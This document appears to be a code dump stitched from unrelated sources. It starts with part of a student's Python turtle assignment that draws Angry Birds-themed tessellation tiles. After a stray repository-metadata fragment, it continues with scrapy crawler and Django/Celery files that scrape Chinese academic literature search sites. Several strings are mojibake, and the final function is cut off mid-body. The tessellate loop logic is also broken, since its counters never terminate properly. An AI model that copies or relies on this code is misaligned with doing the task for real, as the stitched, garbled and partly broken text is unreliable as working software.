been_there = been_there + [[column, row], [column, row + 1]]
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
chr(column + ord('A')) + str(row + 2),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Keep track of the number of attempts
attempts = attempts - 1
# Attempt to place as many 2x1 tiles as possible, up to a fixed limit
attempts = 20
while attempts > 0:
# Choose a random bottom-left location
column = randint(0, grid_width - 2)
row = randint(0, grid_height - 1)
# Try to place the tile there, provided the spaces are both free
if (not [column, row] in been_there) and \
(not [column + 1, row] in been_there):
been_there = been_there + [[column, row], [column + 1, row]]
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
chr(column + ord('A') + 1) + str(row + 1),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Keep track of the number of attempts
attempts = attempts - 1
# Fill all remaining spaces with 1x1 tiles
for column in range(0, grid_width):
for row in range(0, grid_height):
if not [column, row] in been_there:
been_there.append([column, row])
# Append the tile's coords to the pattern, plus the mystery value
pattern.append([chr(column + ord('A')) + str(row + 1),
'X' if randint(1, 100) <= mystery_probability else 'O'])
# Remove any residual structure in the pattern
shuffle(pattern)
# Print the pattern to the shell window, nicely laid out
print('Draw the tiles in this sequence:')
print(str(pattern).replace('],', '],\n'))
# Return the tessellation pattern
return pattern
#
#--------------------------------------------------------------------#
#-----Student's Solution---------------------------------------------#
#
# Complete the assignment by replacing the dummy function below with
# your own "tessellate" function.
#
def two_by_two(): ### Red
### Draw the outer rectangle
setheading(0)
width(3)
fillcolor('steel blue')
begin_fill()
pendown()
forward(200)
left(90)
forward(200)
left(90)
forward(200)
left(90)
forward(200)
end_fill()
penup()
### Outer black circle
setheading(0)
forward(100)
left(90)
forward(100)
pencolor('black')
dot(170)
left(180)
forward(100)
right(90)
forward(100)
setheading(270)
# Positioning of the body
forward(-120)
right(90)
forward(-60)
left(90)
### Main body of bird
width(5)
fillcolor('Firebrick')
begin_fill()
pendown()
right(45)
circle(60, extent = 270)
right(45)
circle(50, extent = 70)
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 40 )
right(190)
circle(50, extent = 60 )
left(30)
circle(50, extent = 20 )
left(30)
circle(50, extent = 20 )
left(70)
forward(10)
end_fill()
penup()
width(3)
### Positioning
forward(70)
### Eye brows
fillcolor('black')
begin_fill()
pendown()
right(140)
forward(30)
right(60)
forward(30)
left(80)
forward(10)
left(105)
forward(35)
left(50)
forward(35)
left(80)
forward(10)
end_fill()
penup()
### Positining
forward(3)
right(90)
forward(-56)
left(90)
### Left eye
fillcolor('white')
begin_fill()
pendown()
left(100)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
### Positioning
right(90)
forward(10)
left(90)
### Right eye
pendown()
fillcolor('white')
begin_fill()
pendown()
left(175)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
### Positioining
setheading(180)
forward(9)
left(90)
forward(15)
#### Right eye dot
pendown()
dot(10)
penup()
### Positioining
setheading(180)
forward(35)
left(90)
forward(-4)
### Left eye dot
pendown()
dot(10)
penup()
### Positioning
setheading(270)
forward(50)
setheading(0)
forward(57)
setheading(90)
### White belly section
fillcolor('wheat')
begin_fill()
pendown()
left(50)
circle(50, extent = 94)
setheading(0)
right(38)
circle(50, extent = 94)
end_fill()
penup()
### Positioning
left(90)
forward(70)
right(90)
right(30)
forward(18)
left(30)
### Beak
width(3)
fillcolor('Orange')
begin_fill()
pendown()
left(170)
circle(50, extent = 30)
left(120)
forward(30)
left(120)
forward(25)
end_fill()
penup()
### Positioning
setheading(270)
forward(22)
### Bottom part of beak
width(2)
fillcolor('Dark Orange')
begin_fill()
pendown()
left(45)
forward(10)
left(100)
forward(12)
left(135)
forward(12)
end_fill()
penup()
def one_by_one(): ### Yellow
### Tile outline
setheading(0)
pendown()
setheading(0)
width(3)
pencolor('black')
fillcolor('beige')
begin_fill()
forward(100)
left(90)
forward(100)
left(90)
forward(100)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(20)
left(90)
forward(10)
### Chucks body
width(3)
fillcolor('yellow')
begin_fill()
pendown()
right(100)
circle(200, extent = 20)
left(90)
circle(200, extent = 20)
left(100)
circle(200, extent = 24)
left(120)
forward(5)
end_fill()
### Positioning
penup()
setheading(0)
forward(50)
left(90)
forward(60)
### Spiky Hair
fillcolor('black')
begin_fill()
pendown()
right(50)
circle(20, extent = 70)
right(220)
forward(10)
right(110)
circle(30, extent = 40)
left(120)
forward(15)
right(150)
circle(30, extent = 40)
left(130)
forward(20)
end_fill()
### Positioning
penup()
setheading(0)
right(90)
forward(25)
right(90)
forward(5)
### Eyes
penup()
right(90)
forward(-8)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
right(90)
forward(20)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
### Positioning
left(180)
forward(20)
left(90)
forward(12)
left(100)
### Beak
fillcolor('orange')
begin_fill()
pendown()
width(2)
forward(15)
right(20)
forward(15)
setheading(180)
left(10)
forward(10)
left(90)
forward(10)
left(10)
forward(10)
setheading(180)
right(40)
forward(32)
end_fill()
### Positioning
penup()
setheading(180)
forward(9)
setheading(90)
forward(25)
### Left eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
### Positioning
penup()
setheading(0)
forward(20)
setheading(90)
forward(5)
setheading(0)
### Right eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
penup()
def horizontal(): ### Bad Piggie
### Tile outline
setheading(0)
fillcolor('sandy brown')
begin_fill()
width(3)
pendown()
forward(200)
left(90)
forward(100)
left(90)
forward(200)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(100)
setheading(90)
forward(5)
### Body
pencolor('dark green')
fillcolor('lawn green')
begin_fill()
pendown()
setheading(0)
circle(40)
end_fill()
### Ears
penup()
circle(40, extent = 130)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 90)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 150)
setheading(90)
forward(40)
### Eyes
setheading(180)
forward(30)
pendown()
pencolor('green')
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
penup()
setheading(0)
forward(25)
pendown()
pencolor('green')
dot(30)
pencolor('yellow green')
dot(25)
### Nose holes
penup()
setheading(180)
forward(5)
pendown()
pencolor('dark green')
dot(10)
setheading(0)
penup()
forward(10)
pendown()
dot(10)
penup()
forward(20)
pendown()
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
### Positioning
pencolor('dark green')
penup()
setheading(180)
forward(25)
setheading(270)
forward(20)
dot(15)
penup()
forward(-5)
pencolor('white')
pendown()
dot(5)
setheading(0)
forward(-5)
dot(5)
forward(10)
dot(5)
penup()
### TNT BOX
setheading(180)
forward(100)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(15)
left(90)
forward(60)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(120)
right(90)
forward(30)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
def vertical(): ### The Blues
### Tile outline
setheading(0)
fillcolor('light coral')
begin_fill()
width(3)
pendown()
forward(100)
left(90)
forward(200)
left(90)
forward(100)
left(90)
forward(200)
end_fill()
penup()
### Positioning
setheading(0)
forward(30)
left(90)
forward(30)
### Body
fillcolor('steel blue')
begin_fill()
pendown()
setheading(0)
right(19)
circle(50, extent = 110)
setheading(90)
forward(40)
circle(50, extent = 50)
right(40)
circle(20, extent = 90)
left(30)
circle(20, extent = 20)
left(30)
circle(20, extent = 20)
left(40)
forward(15)
right(180)
forward(15)
circle(50, extent = 20)
left(30)
circle(20, extent = 30)
left(30)
circle(20, extent = 30)
left(50)
forward(10)
right(121)
circle(80, extent = 94)
end_fill()
### Positioning
penup()
setheading(90)
forward(90)
setheading(0)
forward(10)
### Left eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
forward(30)
### Right eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
setheading(270)
forward(15)
setheading(180)
forward(45)
### Orange bit under beak
fillcolor('firebrick')
begin_fill()
pendown()
left(130)
circle(50, extent = 60)
left(90)
forward(18)
left(80)
forward(40)
end_fill()
### Positioning
penup()
left(55)
forward(20)
left(170)
### Beak
fillcolor('orange')
begin_fill()
pendown()
forward(30)
right(75)
forward(45)
setheading(180)
forward(60)
end_fill()
fillcolor('orange')
begin_fill()
setheading(270)
left(30)
forward(20)
left(80)
forward(42)
end_fill()
penup()
def broken_tile_two_by_two(): ### Broken Red
setheading(0)
width(3)
fillcolor('steel blue')
begin_fill()
pendown()
forward(200)
left(90)
forward(200)
left(90)
forward(200)
left(90)
forward(200)
end_fill()
penup()
setheading(0)
forward(100)
left(90)
forward(100)
pencolor('black')
dot(170)
left(180)
forward(100)
right(90)
forward(100)
setheading(270)
# positioning of the body
forward(-120)
right(90)
forward(-60)
left(90)
#### body
width(5)
fillcolor('Firebrick')
begin_fill()
pendown()
right(45)
circle(60, extent = 270)
right(45)
circle(50, extent = 70)
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 10 )
left(30)
circle(50, extent = 40 )
right(190)
circle(50, extent = 60 )
left(30)
circle(50, extent = 20 )
left(30)
circle(50, extent = 20 )
left(70)
forward(10)
end_fill()
penup()
width(3)
# positioning
forward(70)
#Brows
fillcolor('black')
begin_fill()
pendown()
right(140)
forward(30)
right(60)
forward(30)
left(80)
forward(10)
left(105)
forward(35)
left(50)
forward(35)
left(80)
forward(10)
end_fill()
penup()
#positining
forward(3)
right(90)
forward(-56)
left(90)
#left eye
fillcolor('white')
begin_fill()
pendown()
left(100)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
#positioning
right(90)
forward(10)
left(90)
#right eye
pendown()
fillcolor('white')
begin_fill()
pendown()
left(175)
circle(20, extent = 30)
left(30)
circle(20, extent = 40)
left(30)
circle(20, extent = 80)
left(30)
forward(2)
end_fill()
penup()
## positioining
setheading(180)
forward(9)
left(90)
forward(15)
#### Eye dot right
pendown()
dot(10)
penup()
## positioining
setheading(180)
forward(35)
left(90)
forward(-4)
#### Eye dot left
pendown()
dot(10)
penup()
#position
setheading(270)
forward(50)
setheading(0)
forward(57)
setheading(90)
# belly
fillcolor('wheat')
begin_fill()
pendown()
left(50)
circle(50, extent = 94)
setheading(0)
right(38)
circle(50, extent = 94)
end_fill()
penup()
#### position
left(90)
forward(70)
right(90)
right(30)
forward(18)
left(30)
###beak
width(3)
fillcolor('Orange')
begin_fill()
pendown()
left(170)
circle(50, extent = 30)
left(120)
forward(30)
left(120)
forward(25)
end_fill()
penup()
##position
setheading(270)
forward(22)
## bottom part of beak
width(2)
fillcolor('Dark Orange')
begin_fill()
pendown()
left(45)
forward(10)
left(100)
forward(12)
left(135)
forward(12)
end_fill()
penup()
### Crack
fillcolor('lightblue')
forward(110)
left(90)
forward(50)
setheading(45)
pendown()
begin_fill()
width(5)
pencolor('black')
forward(40)
left(45)
forward(20)
right(30)
forward(40)
left(40)
forward(30)
right(60)
forward(40)
right(30)
forward(40)
right(20)
forward(20)
left(60)
forward(75)
left(180)
forward(75)
left(30)
forward(20)
left(45)
forward(20)
right(42)
forward(30)
right(25)
forward(50)
right(30)
forward(50)
right(45)
forward(45)
end_fill()
penup()
def broken_one_by_one(): ### Broken Chuck
### Tile outline
setheading(0)
pendown()
setheading(0)
width(3)
pencolor('black')
fillcolor('beige')
begin_fill()
forward(100)
left(90)
forward(100)
left(90)
forward(100)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(20)
left(90)
forward(10)
### Body
width(3)
fillcolor('yellow')
begin_fill()
pendown()
right(100)
circle(200, extent = 20)
left(90)
circle(200, extent = 20)
left(100)
circle(200, extent = 24)
left(120)
forward(5)
end_fill()
### Positioning
penup()
setheading(0)
forward(50)
left(90)
forward(60)
### Spikey Hair
fillcolor('black')
begin_fill()
pendown()
right(50)
circle(20, extent = 70)
right(220)
forward(10)
right(110)
circle(30, extent = 40)
left(120)
forward(15)
right(150)
circle(30, extent = 40)
left(130)
forward(20)
end_fill()
### Positioning
penup()
setheading(0)
right(90)
forward(25)
right(90)
forward(5)
### Eyes
penup()
right(90)
forward(-8)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
right(90)
forward(20)
pendown()
pencolor('black')
dot(15)
pencolor('white')
dot(10)
pencolor('black')
dot(5)
penup()
### Positioning
left(180)
forward(20)
left(90)
forward(12)
left(100)
### Beak
fillcolor('orange')
begin_fill()
pendown()
width(2)
forward(15)
right(20)
forward(15)
setheading(180)
left(10)
forward(10)
left(90)
forward(10)
left(10)
forward(10)
setheading(180)
right(40)
forward(32)
end_fill()
### Positioning
penup()
setheading(180)
forward(9)
setheading(90)
forward(25)
### Left eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
### Positioning
penup()
setheading(0)
forward(20)
setheading(90)
forward(5)
setheading(0)
### Right eye brow
pendown()
pencolor('firebrick')
fillcolor('firebrick')
begin_fill()
setheading(0)
forward(20)
left(90)
forward(2)
left(90)
forward(20)
left(90)
forward(2)
end_fill()
penup()
### Cracked poriton
right(90)
forward(60)
left(90)
forward(50)
setheading(0)
width(5)
pencolor('black')
left(45)
pendown()
fillcolor('light blue')
begin_fill()
forward(20)
left(45)
forward(20)
right(25)
forward(25)
left(25)
forward(10)
right(65)
forward(40)
setheading(90)
forward(10)
setheading(270)
forward(10)
left(55)
forward(40)
setheading(270)
forward(40)
setheading(180)
forward(60)
left(25)
forward(20)
end_fill()
penup()
def broken_horizontal(): ### Broken Bad Piggie
### Tile outline
setheading(0)
fillcolor('sandy brown')
begin_fill()
width(3)
pendown()
forward(200)
left(90)
forward(100)
left(90)
forward(200)
left(90)
forward(100)
end_fill()
penup()
### Positioning
setheading(0)
forward(100)
setheading(90)
forward(5)
### Body
pencolor('dark green')
fillcolor('lawn green')
begin_fill()
pendown()
setheading(0)
circle(40)
end_fill()
### Ears
penup()
circle(40, extent = 130)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 90)
pendown()
fillcolor('lawn green')
begin_fill()
circle(-10)
end_fill()
penup()
circle(40, extent = 150)
setheading(90)
forward(40)
### Eyes
setheading(180)
forward(30)
pendown()
pencolor('green')
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
penup()
setheading(0)
forward(25)
pendown()
pencolor('green')
dot(30)
pencolor('yellow green')
dot(25)
### Nose holes
penup()
setheading(180)
forward(5)
pendown()
pencolor('dark green')
dot(10)
setheading(0)
penup()
forward(10)
pendown()
dot(10)
penup()
forward(20)
pendown()
dot(20)
pencolor('white')
dot(15)
pencolor('black')
dot(5)
### Positioning
pencolor('dark green')
penup()
setheading(180)
forward(25)
setheading(270)
forward(20)
dot(15)
penup()
forward(-5)
pencolor('white')
pendown()
dot(5)
setheading(0)
forward(-5)
dot(5)
forward(10)
dot(5)
penup()
### TNT BOX
setheading(180)
forward(100)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(15)
left(90)
forward(60)
setheading(270)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### TNT BOX
penup()
forward(120)
right(90)
forward(30)
pencolor('saddle brown')
fillcolor('burlywood')
begin_fill()
pendown()
forward(25)
left(90)
forward(25)
left(90)
forward(25)
left(90)
forward(25)
penup()
left(90)
forward(15)
left(90)
forward(5)
end_fill()
pencolor('red')
write('TNT')
### Cracked portion
setheading(180)
forward(156)
setheading(0)
fillcolor('light blue')
begin_fill()
pendown()
width(5)
pencolor('black')
forward(20)
left(65)
forward(40)
right(25)
forward(40)
right(35)
forward(40)
right(65)
forward(30)
left(65)
forward(30)
right(25)
forward(20)
left(25)
forward(24)
left(180)
forward(24)
left(65)
forward(40)
right(60)
forward(20)
right(20)
forward(60)
left(30)
forward(30)
right(35)
forward(30)
penup()
end_fill()
def broken_vertical(): ### Broken The Blues
# Tile outline
setheading(0)
fillcolor('light coral')
begin_fill()
width(3)
pendown()
forward(100)
left(90)
forward(200)
left(90)
forward(100)
left(90)
forward(200)
end_fill()
penup()
### Positioning
setheading(0)
forward(30)
left(90)
forward(30)
### Body
fillcolor('steel blue')
begin_fill()
pendown()
setheading(0)
right(19)
circle(50, extent = 110)
setheading(90)
forward(40)
circle(50, extent = 50)
right(40)
circle(20, extent = 90)
left(30)
circle(20, extent = 20)
left(30)
circle(20, extent = 20)
left(40)
forward(15)
right(180)
forward(15)
circle(50, extent = 20)
left(30)
circle(20, extent = 30)
left(30)
circle(20, extent = 30)
left(50)
forward(10)
right(121)
circle(80, extent = 94)
end_fill()
### Positioning
penup()
setheading(90)
forward(90)
setheading(0)
forward(10)
### Left eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
forward(30)
### Right eye
pendown()
dot(30)
pencolor('white')
dot(25)
penup()
forward(7)
pendown()
pencolor('black')
dot(10)
### Positioning
penup()
setheading(270)
forward(15)
setheading(180)
forward(45)
### Orange bit under beak
fillcolor('firebrick')
begin_fill()
pendown()
left(130)
circle(50, extent = 60)
left(90)
forward(18)
left(80)
forward(40)
end_fill()
### Positioning
penup()
left(55)
forward(20)
left(170)
### Beak
fillcolor('orange')
begin_fill()
pendown()
forward(30)
right(75)
forward(45)
setheading(180)
forward(60)
end_fill()
fillcolor('orange')
begin_fill()
setheading(270)
left(30)
forward(20)
left(80)
forward(42)
end_fill()
penup()
# Cracked portion
forward(20)
setheading(180)
width(5)
pendown()
fillcolor('light blue')
begin_fill()
left(65)
forward(80)
right(25)
forward(20)
right(55)
forward(30)
right(90)
forward(50)
left(30)
forward(20)
right(30)
forward(50)
left(30)
forward(40)
right(90)
forward(30)
right(90)
forward(50)
left(90)
forward(28)
penup()
end_fill()
# Fill the grid with tiles as per the provided dataset
def tessellate(random_pattern):
#######################################################################
### This first section creates the while loop to acess the entire list generated by random_pattern
n = len(random_pattern)
while n >= 0:
position = 0
while position >= 0:
length = len(random_pattern[position])
position = position + 1
#######################################################################
### This section is for the random patterns featuring lists of legnth 3
if length == 3:
if (((random_pattern[position - 1])[0])[1]) == (((random_pattern[position - 1])[1])[1]):
if str(((random_pattern[position - 1])[2])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60)
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
horizontal() # What it draws
elif str(((random_pattern[position - 1])[2])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60)
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_horizontal() # What it draws
else: # Since lists in random pattern with a length of 3 feature two cases, a horizontal and vertical pattern else statement is needed for second case (vertical).
if str(((random_pattern[position - 1])[2])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60)
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
vertical() # What it draws
elif str(((random_pattern[position - 1])[2])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60)
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_vertical() # What it draws
#######################################################################
### This section is for the random patterns featuring lists of legnth 5
elif length == 5:
if str(((random_pattern[position - 1])[4])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60)
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
two_by_two() # What it draws
elif str(((random_pattern[position - 1])[4])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos (horizontal position) and y_pos (vertical position) determination. ###
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60)
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_tile_two_by_two() # What it draws
######################################################################
### This section is for the random patterns featuring lists of legnth 2
elif length == 2:
if str(((random_pattern[position - 1])[1])) == 'O': # Case where pattern ends with O.
### Co-ordinates x_pos and y_pos determination.
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60) # Finds x position using ord of the first letter of the list.
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
one_by_one() # What it draws
elif str(((random_pattern[position - 1])[1])) == 'X': # Case where pattern ends with X.
### Co-ordinates x_pos and y_pos determination.
for x_pos in random_pattern:
x_pos = ((ord(((random_pattern[position - 1])[0])[0])) - 60) # Finds x position using ord of the first letter of the list.
for y_pos in random_pattern:
y_pos = int((((random_pattern[position - 1])[0])[1]))
### Using x_pos and y_pos a linear regression is formed for each caclulating the positions on the grid. ###
goto(((100*x_pos) - 1000), ((int(y_pos) *100) - 450))
pencolor('black')
broken_one_by_one() # What it draws
n = n - 1
# ord() converts the letters
# chr() converts the numbers
#
#--------------------------------------------------------------------#
#-----Main Program---------------------------------------------------#
#
# This main program sets up the background, ready for you to start
# drawing your solution. Do not change any of this code except
# as indicated by the comments marked '*****'.
#
# Set up the drawing canvas
# ***** You can change the background and line colours, and choose
# ***** whether or not to draw the grid and mark the places for the
# ***** legend, by providing arguments to this function call
create_drawing_canvas()
tracer(False)
penup()
goto(-750,100)
two_by_two()
penup()
goto(-750,70)
pendown()
pencolor('black')
write('Red', font =("Arial", 18, "normal"))
penup()
goto(-700,-100)
one_by_one()
goto(-700,-130)
pendown()
pencolor('black')
write('Chuck', font =("Arial", 18, "normal"))
penup()
goto(600, 100)
pencolor('black')
vertical()
penup()
goto(600,70)
pendown()
pencolor('black')
write('The Blues', font =("Arial", 18, "normal"))
penup()
goto(550, -100)
horizontal()
penup()
goto(550,-130)
pendown()
pencolor('black')
write('Bad Piggies', font =("Arial", 18, "normal"))
penup()
# Control the drawing speed
# ***** Change the following argument if you want to adjust
# ***** the drawing speed
speed('fastest')
# Decide whether or not to show the drawing being done step-by-step
# ***** Set the following argument to False if you don't want to wait
# ***** forever while the cursor moves slowly around the screen
tracer(False)
# Give the drawing canvas a title
# ***** Replace this title with a description of your solution's theme
# ***** and its tiles
title("Angry Birds & Piggies")
### Call the student's function to follow the path
### ***** While developing your program you can call the tessellate
### ***** function with one of the "fixed" data sets, but your
### ***** final solution must work with "random_pattern()" as the
### ***** argument. Your tessellate function must work for any data
### ***** set that can be returned by the random_pattern function.
#tessellate(fixed_pattern_0) # <-- used for code development only, not marking
tessellate(random_pattern()) # <-- used for assessment
# Exit gracefully
# ***** Change the default argument to False if you want the
# ***** cursor (turtle) to remain visible at the end of the
# ***** program as a debugging aid
release_drawing_canvas()
#
#--------------------------------------------------------------------#
``` |
{
"source": "josephHai/LiteratureRetrieval",
"score": 3
} |
#### File: crawler/crawler/urls.py
```python
from urllib.parse import urlencode
from scrapy.utils.project import get_project_settings
max_page = get_project_settings()['MAX_PAGE'] + 1
def wf(keywords):
for page in range(1, max_page):
params = {
'beetlansyId': 'aysnsearch',
'searchType': 'all',
'pageSize': 50,
'page': page,
'searchWord': keywords,
'order': 'correlation',
'showType': 'detail',
'isCheck': 'check',
'firstAuthor': 'false',
'corePerio': 'false',
'alreadyBuyResource': 'false',
'navSearchType': 'all'
}
yield 'http://www.wanfangdata.com.cn/search/searchList.do?' + urlencode(params)
def ixs(keywords):
for page in range(1, max_page):
params = {
'search_type': '',
'q': keywords,
'page': page
}
yield 'https://www.ixueshu.com/search/index.html?' + urlencode(params)
def wp(keywords):
param = {}
for page in range(1, max_page):
param['ObjectType'] = 1
param['ClusterUse'] = 'Article'
param['UrlParam'] = 'u={}'.format(keywords)
param['Sort'] = 0
param['UserID'] = 189654
param['PageNum'] = page
param['PageSize'] = 100
param['ShowRules'] = 'ไปปๆๅญๆฎต={}'.format(keywords)
yield {'searchParamModel': str(param)}
```
#### File: crawler/crawler/utils.py
```python
from os.path import realpath, dirname
import json
def get_config(name):
path = dirname(realpath(__file__)) + '/configs/' + name + '.json'
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
def update_config(name, data):
path = dirname(realpath(__file__)) + '/configs/' + name + '.json'
with open(path, 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=1)
```
#### File: backend/crawler/run.py
```python
import time
import logging
from scrapy.utils.project import get_project_settings
from scrapy.crawler import CrawlerProcess
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from celery import shared_task
from django.core.cache import cache
from pyhanlp import *
from jpype import *
from nltk.corpus import stopwords
from backend.crawler.crawler.utils import get_config, update_config
from ..models import Content
logger = logging.getLogger(__name__)
@shared_task()
def run(kw, source):
os.chdir('/home/respeaker/LiteratureRetrieval/backend/crawler')
names = source
project_settings = get_project_settings()
process = CrawlerProcess(project_settings)
for name in names:
custom_settings = get_config(name)
custom_settings['start_urls']['args'] = [kw]
update_config(name, custom_settings)
spider = custom_settings.get('spider', 'literature')
process.crawl(spider, **{'name': name})
process.start(stop_after_crawl=False)
class Worker:
def __init__(self, kw, source):
self.source = source
self.kw = self.handle_kw(kw)
def get_data(self, page_num, page_size):
if self.kw == '':
return [], 0
logger.info('ๅฝๅๅ
ณ้ฎ่ฏไธบ: {}'.format(self.kw))
logger.info('ๅคๆญๆฏๅฆไธบ็ฌฌไธๆฌก่ฏทๆฑ')
if self.is_first_request():
Content.objects.all().delete()
logger.info('ๅฏๅจ็ฌ่ซ')
current = time.time()
# ๅฏๅจ็ฌ่ซ
run.delay(self.kw, self.source)
logger.info('ๅฏๅจๅฎๆ,็จๆถ{}'.format(time.time() - current))
i = 0
while not self.data_count():
if i >= 10:
break
i = i + 1
time.sleep(1)
# ไปๆฐๆฎๅบ่ทๅๆฐๆฎ
data = Content.objects.values('title', 'authors', 'brief', 'source', 'website')
paginator = Paginator(data, page_size)
try:
literature = paginator.page(page_num)
except PageNotAnInteger:
literature = paginator.page(1)
except EmptyPage:
literature = paginator.page(paginator.num_pages)
literature = list(literature)
for index, item in enumerate(literature):
sources = item['source'].split('||')
websites = item['website'].split('||')
links = list(set(sources))
links.sort(key=sources.index)
names = list(set(websites))
names.sort(key=websites.index)
